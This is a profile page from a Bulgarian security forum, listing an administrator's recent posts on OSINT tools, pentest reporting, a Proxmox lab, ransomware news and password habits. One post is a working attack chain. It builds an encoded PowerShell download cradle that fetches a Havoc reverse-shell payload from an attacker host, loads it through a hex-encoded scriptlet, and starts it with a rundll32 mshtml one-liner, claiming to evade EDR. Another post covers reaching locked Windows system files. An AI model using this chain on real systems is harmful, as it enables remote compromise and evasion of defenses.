Преминете към съдържанието

Добре дошли в Хакинг.БГ! 

Всеки един от нас стои на раменете на гигантите, споделили знанията и опита си с нас.

Този форум е нашият начин да върнем жеста за бъдещите и текущите кадри в киберсигурността.

Стремим се да предоставим платформа, където членовете могат да развиват своите умения, като се дава приоритет на етиката, сигурността и поверителността!

h3xu

[Администратор]
  • Брой теми

    137
  • Присъединен

  • Последно видян

  • Спечелени дни

    37

h3xu последно спечели деня на Юли 10

h3xu имаше най-харесваното съдържание!

About h3xu

Персонална Информация / Интереси

  • Уебсайт
  • Фейсбук
    https://www.linkedin.com/in/1v4nov/
  • Интереси
    CyberSecurity
    Reverse Engineering
    Ethical Hacking
    Social Engineering
    Learning CyberSecurity
    Advertising
    CTF Events
    Web Design
    Web Development

От къде сте

  • Локация
    България

Последно видят от:

Опцията за последните посетители е деактивирана и не се показва на други потребители.

Постиженията на h3xu

Хакер IV

Хакер IV (8/12)

  • Член на 1 година Rare
  • 10 последователи Rare
  • Член на 1 месец
  • Член на 1 седмица
  • Активен член

Скорошни значки

87

Репутация в общността

  1. Здравей, нямам особено много време да вляза в по-дълбоко обяснение, но провери следните инструменти: 1. https://github.com/DefectDojo/django-DefectDojo 2. Faraday 3. Dradis 5. PwnDoc има и други, които са интересни. Смятам, че е много важно човек да се научи как да пише репорт - това е много, много, много важно умение в бизнес частта на пентестинга и консултантството. И смятам, че трябва да създадеш собствен темплейт и постепенно да се отделиш от ПЪЛНАТА автоматизация и да използваш частично, докато не напредне значително. Успех!
  2. Украински хакери локализираха руски колони транспортиращи войници към новооткрития фронт в Курск, хаквайки крайпътни камери. Това е довело до много прецизни артилерийски удари по спрели за няколко часа камиони и транспортьори:
  3. Разбих паролите на 80 служителя на една компания, смениха им ги с 10 дължина (от 5) и имаше истински бунт в предприятието. Протест 2 дни.
  4. SynapsInt е платформа, предлагаща унифициран OSINT (Open Source Intelligence) изследователски инструмент. Включва инструменти за анализиране на домейни, IP адреси, SSL, анализи и други, заедно с интеграции за идентифициране на опити за фишинг: https://synapsint.com/ ----------------------------------------------------------------------- MXToolbox предоставя следните функционалности: https://mxtoolbox.com/ Проверка на DNS записи Анализ на черни списъци (blacklist) SMTP диагностика Инструменти за проверка на имейл Мониторинг на мрежови портове Търсене на IP информация Проверка на SSL сертификати ----------------------------------------------------------------------- Censys предоставя следните функционалности: https://search.censys.io/ Търсене на интернет активи като домейни, IP адреси и сертификати Откриване на уязвимости и потенциални заплахи Наблюдение на мрежови активности и промени Инструменти за оценка на сигурността Интеграция с други инструменти за анализ и защита на данни ----------------------------------------------------------------------- SSL Labs предоставя следните функционалности: Тестване на конфигурацията на SSL/TLS сертификати Оценка на сигурността на SSL/TLS връзки Подробен анализ на сертификати, криптографски алгоритми и уязвимости Резултати и препоръки за подобрение на сигурността ----------------------------------------------------------------------- IPinfo предоставя следните функционалности: https://ipinfo.io/ Информация за геолокация на IP адреси Подробности за ISP (интернет доставчик) и организация Данни за автономни системи (AS) API за интеграция и автоматизация Отчети за използване и статистика на IP адреси ----------------------------------------------------------------------- BGP.Tools предоставя следните функционалности: https://bgp.tools/ Анализ и мониторинг на BGP (Border Gateway Protocol) Информация за маршрутизация на интернет трафик Търсене и визуализация на BGP данни Инструменти за диагностика и оптимизация на мрежи Данни за автономни системи (AS) и IP префикси ----------------------------------------------------------------------- VirusTotal предоставя следните функционалности: https://www.virustotal.com/gui/home/upload Сканиране на файлове и URL адреси за зловреден софтуер Анализ на подозрителни файлове с множество антивирусни програми Репорти за сигурността на домейни и IP адреси Общностна платформа за споделяне на информация за заплахи API за автоматизация и интеграция с други инструменти ----------------------------------------------------------------------- BuiltWith предоставя следните функционалности: https://builtwith.com/ Анализ на технологии, използвани от уебсайтове Информация за CMS, хостинг, скриптове и библиотеки Данни за платформи за електронна търговия и рекламни мрежи Проследяване на тенденции в използването на уеб технологии Инструменти за изследване на пазара и конкурентен анализ ----------------------------------------------------------------------- Mozilla Observatory предоставя следните функционалности: https://observatory.mozilla.org/ Анализ на сигурността на уебсайтове Проверка на конфигурацията на HTTP заглавки Оценка на уязвимостите и препоръки за подобрение Инструменти за мониторинг и докладване за сигурността Интеграция с други услуги за подобряване на защитата ----------------------------------------------------------------------- Shodan предоставя следните функционалности: https://www.shodan.io/ Търсене на интернет-свързани устройства и системи Откриване на уязвимости и потенциални заплахи Анализ на устройства, като сървъри, камери, рутери и IoT устройства Инструменти за киберсигурност и мониторинг на мрежи API за автоматизация и интеграция с други системи ----------------------------------------------------------------------- Деплойнал съм си с други инструменти и този: https://github.com/lissy93/web-check И съм много доволен.
  5. Аз смятам,че е супер опасно да демонстрираш интелекта и знанията си на организации, за които не знаеш нищо и които очевидно крият нещо съществено за себе си. Не винаги има хепи енд и това, че те откриват, дори чрез такъв забавен начин - не означава непременно нещо добро за теб. Понякога може да доведе до "предложение, което не можеш да откажеш". Затова винаги имайте предвид за кого и пред кого демонстрирате каквото и да е свързано с интелект и know-how свързан с кибер атаки или криптография.
  6. Използвам в този пок 3 машини : 1 командо за създаване на зловредни програми; 1 кали за сервиране на файлове, C2 и други неща; 1 domain controller. Този пок работи и в привилигирован и непривилигирован ps шел. В командото (10) създайте пейлоуд енкодиран в base64 и запазете в текстов файл: $command = "IEX(New-Object Net.WebClient).DownloadString('http://192.168.56.128/hav-pay.exe')" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) Write-Output $encodedCommand В горния код създавам три параметъра, които започват с $ знак. В $command запазвам кода, който при екзекуция от "жертвата" ще направи обратна връзка към атакуващата машина, хостваща файла hav-pay.exe, което е хавок пейлоуд. В кали превърнете пейлоуда в шестнадесетична форма, която ще стейджнем echo -n "new ActiveXObject(\"WScript.Shell\").Run(\"powershell.exe -nop -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA1ADYALgAxADIAOAAvAGgAYQB2AC0AcABhAHkALgBlAHgAZQAnACkA\")" | xxd -p | tr -d '\n' > hex.payload Копирайте следващия код във файл с някакво рандом име и вкарайте hexadecimal кода в променливата hex: <?xml version="1.0"?> <component> <script> try{ <![CDATA[ var hex = "ТУК"; var str = ''; for (var n = 0; n < hex.length; n += 2) { str += String.fromCharCode(parseInt(hex.substr(n, 2), 16)); } eval(str) ]]> }catch(e){ eval(str) } </script> </component> Създайте папка и преместете последния код (test.tmp) и hav-pay.exe в нея. Пуснете сървър. Може и http-server, python http.server, може nginx, каквото си предпочитате за сервиране на файлове. (python -m http.server 80) В компютъра на жертвата отворете powershell, като администратор например: rundll32 javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ,RunHTMLApplication";document.write();GetObject("script"+":"+"http://<IP>/test.tmp") В моя случай използвам havoc reverse shell payload и го инжектирам директно в паметта, създавайки свръзка без да провокира реакция в EDR защитата. Не съм тествал на други EDR-и. понеже една част от тоя poc го пиша и по спомен не си спомням дали пейлоуда който ползвах беше .exe или ps1
  7. Кой не се е сблъсквал с Password123. Особено в България най-честите пароли са ЕГН, рожденни дати, имена на деца и близки хора и дати на сватби. Лесно достъпна информация, която може да генерира добър wordlist.
  8. h3xu

    BS Ping

    Интересно е от гледна точка на функционалнотите, които поддържа, но ми изглежда като твърде много труд с фокус върху няколко системни команди. С няколко команди в терминала и един сърч повечето информация може да бъде изкарана.
  9. Човек си дава сметка за проблема, като си направи нов акаунт и ботовете го нападнат със десетки приятелства на момента ;д
  10. Спомням си, че нмап имаше nse или опция да превръща аутпута в 1337 и беше доста забавен.
  11. Скоро не бях имал пентест на AD + EDR и като започнах да чета и да опреснявам информацията осъзнах, че съм позабравил някои неща. Затова реших да си сетъпна скромна лабораторна среда, в която да се упражнявам. В моята конфигурация използвам 1 домейн контролър, 2 уиндолс машини (11-ка и 10-ка), като едната си я конфигурирам аз с определени уязвимости, които искам да тествам, а другата съм я създал с https://github.com/cliffe/SecGen ,което е доста як проект и със сигурност ще ви хареса идеята. За целта използвам един рециклиран сървър 2-ра ръка, бюджетен за 1к лв със следните спекове (доста съм доволен от работата, която ми върши): 64 x Intel(R) Xeon(R) CPU E5-2698 v3 @ 2.30GHz (2 Sockets), а във втория драйв, където държа машините имам 2тера място още. Освен сървър, можете да превърнете някой лаптоп или настолен който не използвате, но има що годе ок спекове в Bare Metal Server по същата процедура, която ще опиша: Инсталирате ProxMox на сървъра (колегите ме посъветваха да го ползвам и съм супер доволен от избора си да ги послушам). Документация за ProxMox: https://www.proxmox.com/en/proxmox-virtual-environment/get-started Супер лесна и бърза е инсталацията, ако се затруднявате използвайте ютуб - има доста видеа как се инсталира. След като сте инсталирали проксмокс, вече би трябвало да сте конфигурирали мрежовите настройки според вашите нужди. Аз имам няколко мрежи вкъщи и за този събнет използвам различни настройки от вашите, затова няма смисъл да ги показвам, но нещата са елементарни (/etc/network/interfaces), ако ви е нужна помощ - има доста видеа в ютуб специално за нетуорк конфа. В GUI-то трябва да видите нещо такова: Първото е мястото, в което ще изтеглите iso-тата: Изтегляте Windows Server 2019, като копирате линка, който получавате от официалното репо от тук: https://info.microsoft.com/ww-landing-windows-server-2019.html след като попълните формуляра (не е нужно данните да са реални) и го пействате във формата на "download from url" от проксмокс. Изтегляте Windows 10 Enterprise от тук: https://info.microsoft.com/ww-landing-windows-10-enterprise.html Създавате виртуална машина и ако ви трябва помощ - този пич ( https://www.youtube.com/watch?v=kOdf4_QPrZw ) много приятно и разбираемо обяснява нещата ако го правите за пръв път. Отделно документация можете да намерите тук: документация за препоръчителни настройки тук: https://pve.proxmox.com/wiki/Windows_10_guest_best_practices#Install Конфигурацията за 10-ката: Конфигурацията за сървъра: После повтаряте процеса за клиентските машини. Ако не ви открие драйвърите, като при мен, за 10-ката... селектирайте ръчно /vioscsi/w10/amd64 (като се предполага, че и вие имате 64 бита процесор). --- не ми стига времето да довърша поста 😄
  12. Проблема, с който се сблъскваш е поради факта, че тези системни файлове са в заключен режим, докато операционната система работи. Да, променил си им правата, но това не е достатъчно. Има няколко възможни начина... Единия е този, който съм използвал аз в миналото, а именно да dual-boot-неш втора ОС от USB и да се опиташ да достъпиш системните файлове на уиндолс през файловата система. Докато първата ОС е в неработещ режим тези файлове би трябвало да не са заключени. Друг вариант, който съм чувал, че също е валиден е да се рестартира системата в безопасен режим - понякога тия файлове не се използват в такъв режим, но са достъпни и може да не са заключени. Горните примери са при положение,че имаме такава възможност, като достъп до системата разбира се, което е рядкост. VSS е друг начин, който също е валиден в някои сценарии: https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics#volume-shadow-copies https://learn.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service
  13. 100 болници в цяла Румъния са извадили системите си офлайн, след като рансъмуер атака засегна системата им за управление на здравеопазването. Информационната система "Хипократ" (HIS), използвана от болниците за управление на медицинската дейност и данните на пациентите, беше таргетирана през уикенда и сега е офлайн, след като базата й данни беше криптирана. Докато за 25 болници вече е потвърдено, че данните им са криптирани от нападателите, 75 други здравни заведения, използващи HIS, също са изнесли системите си офлайн като предпазна мярка, докато инцидентът се разследва. "През нощта на 11 срещу 12 февруари 2024 г. масивна кибератака на ransomware беше насочена към производствените сървъри, работещи с информационната система HIS. В резултат на атаката системата е изключена, файловете и базите данни са криптирани", заявиха от румънското министерство на здравеопазването. "Инцидентът се разследва от IT специалисти, включително експерти по киберсигурност от Националната дирекция по киберсигурност (DNSC) и се оценяват възможностите за възстановяване. Задействани са извънредни предпазни мерки и за останалите болници, които не са засегнати от нападението". Атаката с рансъмуер засегна различни болници в цяла Румъния, включително регионални центрове и центрове за лечение на рак, като екип от експерти по киберсигурност на DNSC в момента разследва въздействието на атаката. DNSC твърди, че нападателите са използвали рансъмуер Backmydata, за да криптират данните на болниците, вариант на ransomware от семейството на Phobos. "Повечето от засегнатите болници имат резервни копия на данни на засегнатите сървъри, като данните са запазени сравнително наскоро (преди 1-2-3 дни) с изключение на една, чиито данни са запазени преди 12 дни", посочват от DNSC. Нападателите са изпратили искане за откуп от 3,5 BTC (приблизително 157 000 евро). Името на групата, поемаща отговорност за атаката, обаче не се споменава в бележката за откуп, а само имейл адрес. Откакто системите бяха изключени, лекарите бяха принудени да се върнат към писането на рецепти и воденето на записи на хартия. "След като 400 компютъра и сървъри бяха изключени, работихме предимно на хартия", казва мениджърът на Регионалния институт по онкология Яш (IRO Iasi) Мирела Гросу пред Agerpres. "Искам да кажа, че направихме непрекъснати записи за прием на хартия, записи за дневен прием на хартия, написахме препоръки за медицински тестове на хартия. Всичко се прави на хартия, точно както го правехме и преди години". "Всички сървъри са спрени. Интернет също е спрян, така че няма да има загуба, изтичане на данни или нещо друго", добави системният инженер Флорин Трандабац. Към момента няма информация каква рансъмуер операция е криптирала платформата за управление на медицинските услуги на болниците или дали по време на инцидента са били откраднати и лични или медицински данни на пациенти. RSC (Romanian Soft Company SRL), доставчикът на софтуерни услуги зад здравната система на Хипократ, все още не е издал публично изявление относно този инцидент. ---------------------- Допълнителна информация Backmydata е вариант на ransomware от семейството на Phobos. Следния анализ на мауербайтс върху друг вариант от семейството на Фобос доста добре описва начина на работа: https://www.malwarebytes.com/blog/news/2019/07/a-deep-dive-into-phobos-ransomware

HACKING.BG Партньори

Asset3.png.df693f7661f6e8a7a3ec208659eda80b.pngtransparent1.png.c15979e1dc997cdd3a9941e342368a9b.png2.png.3e2592eadc660ecc831f1fdd569e8eb4.png600_489534840.png.72981fb02b90f1986dd7ade4d561e6d0.pngcyberclub-logo-text.png.6e9d11752e2eade43d40337d83365e48.png

×
×
  • Създай ново...

Важна информация!

Политика за сигурност и условия на ползване Privacy Policy